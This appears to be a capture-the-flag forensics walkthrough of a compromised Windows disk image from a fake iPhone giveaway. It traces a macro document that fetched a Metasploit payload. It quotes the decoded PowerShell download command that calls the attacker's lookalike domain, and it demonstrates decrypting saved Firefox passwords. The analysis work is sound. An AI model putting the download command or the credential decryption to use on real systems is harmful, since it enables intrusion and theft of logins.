A company’s employee joined a fake iPhone giveaway. Our team took a disk image of the employee's system for further analysis. As a security analyst, you are tasked to identify how the system was compromised.
Information
Category Name: Phishy
Files: c43-GiveAway.zip 932 MB
–> Contains GiveAway.ad1 893MB
My Recommendations
This is my personal preference, I like being organized and deleting a folder when I’m done with it.
mkdir Documents/CyberDefenders/Giveaway && cd Documents/CyberDefenders/GiveawayDownload it from the Cyber Defenders and verify the file with sha1sum:
sha1sum /path/to/c43-GiveAway.zipSHA1: 1c8885928168ca9f8ae27db7f98eef06d3c33817.
Then extract it with the provided the password
Run it with:
wine '.wine/drive_c/Program Files/AccessData/FTK Imager/FTK Imager.exe'
Once it’s installed, select: Add Evidence item and select GiveAway.ad1. Then, open the “tree” and rich click on ‘[root]’ and select “Export Files” and chose the WD as the export destination.
Walkthrough
1. What is the hostname of the victim machine?
Using RegRipper:
rip.pl -r Windows/System32/config/SYSTEM -p compname
Answer: WIN-NF3JQEU4G0T
2. What is the messaging app installed on the victim machine?
A quick and easy way to find which apps may be installed and used is to list the AppData directory:
ls -la Users/*/AppData/*
The only messaging app is WhatsApp.
Answer: Whatsapp
3. The attacker tricked the victim into downloading a malicious document. Provide the full download URL.
In my experience, Microsoft Office documents are the most common malicious documents. Looking for a doc in the Users directory:
find Users/ -type f -name "*.doc"
Returns IPhone-Winners.doc in Semah’s Downloads directory. We can grep for the name of the doc (using -i flag to ignore case) :
grep -r -i 'IPhone-Winners' Users/Semah/
The only file matching is the WhatsApp msgstore database, using strings and grep is a good way to get an idea of where the ‘iphone-winners’ string might be:
strings Users/Semah/AppData/Roaming/WhatsApp/Databases/msgstore.db | grep -i IPhone-Winners
Only one line matches, and its the download link. Usually, it would be best practice to open the database to view its full contents, but since it’s a specific question, a CTF and only one match returned we can leave it at that.
Answer: http[://]appIe[.]com/IPhone-Winners[.]doc
4. Multiple streams contain macros in the document. Provide the number of the highest stream.
First copying the file to the current directory and then using oledump:
cp Users/Semah/Downloads/IPhone-Winners.doc Iphone.doc
oledump.py Iphone.doc
The macro with the highest stream is 10.
Answer: 10
5. The macro executed a program. Provide the program name?
Using Olevba:
olevba --deobf Iphone.doc
The only program that is being executed is powershell.
Answer: Powershell
6. The macro downloaded a malicious file. Provide the full download URL.
Using Olevba:
In the previous command, before the powershell keyword, there is a Base64 encoded string. The reveal option makes it easier to copy the string:
olevba --deobf --reveal Iphone.doc
echo -n 'base64encodedstring' | base64 -d
Returns:
invoke-webrequest -Uri ‘http[://]appIe[.]com/Iphone[.]exe’ -OutFile ‘C:\Temp\IPhone.exe’ -UseDefaultCredentials
Answer: http[://]appIe[.]com/Iphone[.]exe
7. Where was the malicious file downloaded to? (Provide the full path)
The decoded VBA string shows that the outfile is in C:\Temp\IPhone.exe. To make sure it was indeed downloaded there:
ls -la Temp
Answer: C:\Temp\IPhone.exe
8. What is the name of the framework used to create the malware?
To find out more about the malware, we can check it in virus total by uploading it or searching for it’s hash.
md5sum Temp/IPhone.exe
VirusTotal flags the file as a Trojan.Meterpreter, which means it was created with the Metasploit framework.
Answer: Metasploit
9. What is the attacker's IP address?
In VirusTotal, if you click on the Relations tab, you can see that the malware contacted two hosts:
192.168.0.30 is the router’s default IP, so the attacker’s IP is 155.94.69.27
Answer: 155.94.69.27
10. The fake giveaway used a login page to collect user information. Provide the full URL of the login page?
In Question 2, we can see that Semah uses Firefox as a web browser, so if he were to have entered his information, he must have clicked on the link. Phishing websites typically use php, we can assume we are looking for a ‘login.php’ url. This helps reduce our grep query:
grep -r -s -l 'login.php' Users/Semah/AppData/*/Mozilla/*
The two matches are the ‘places’ database and login.json. The logins.json only contains one field, which is for “appIe(dot)com/login.php”. This is a secured webpage, so we can check the places.sqlite-wal file:
strings Users/Semah/AppData/Roaming/Mozilla/Firefox/Profiles/pyb51x2n.default-release/places.sqlite-wal | grep -i login.php
The returned url is unsecured, meaning it was most likely the fake login page.
Answer: http[://]appIe[.]competitions[.]com/login[.]php
11. What is the password the user submitted to the login page?
The logins.json contains the credentials, but they are encrypted with a key stored in key4.db. You can following this tutorial if you wish to proceed manually. I used firefox_decrypt to decrypt the credentials:
python3 firefox_decrypt.py ~/Documents/CyberDefenders/Giveaway/Users/Semah/AppData/Roaming/Mozilla/Firefox/Profiles/pyb51x2n.default-release
Answer: GacsriicUZMY4xiAF4yl
TLDR
– Phishy is a Windows Forensics challenge about a fake giveaway.
– It’s a combination of Maldoc and Windows Forensics.
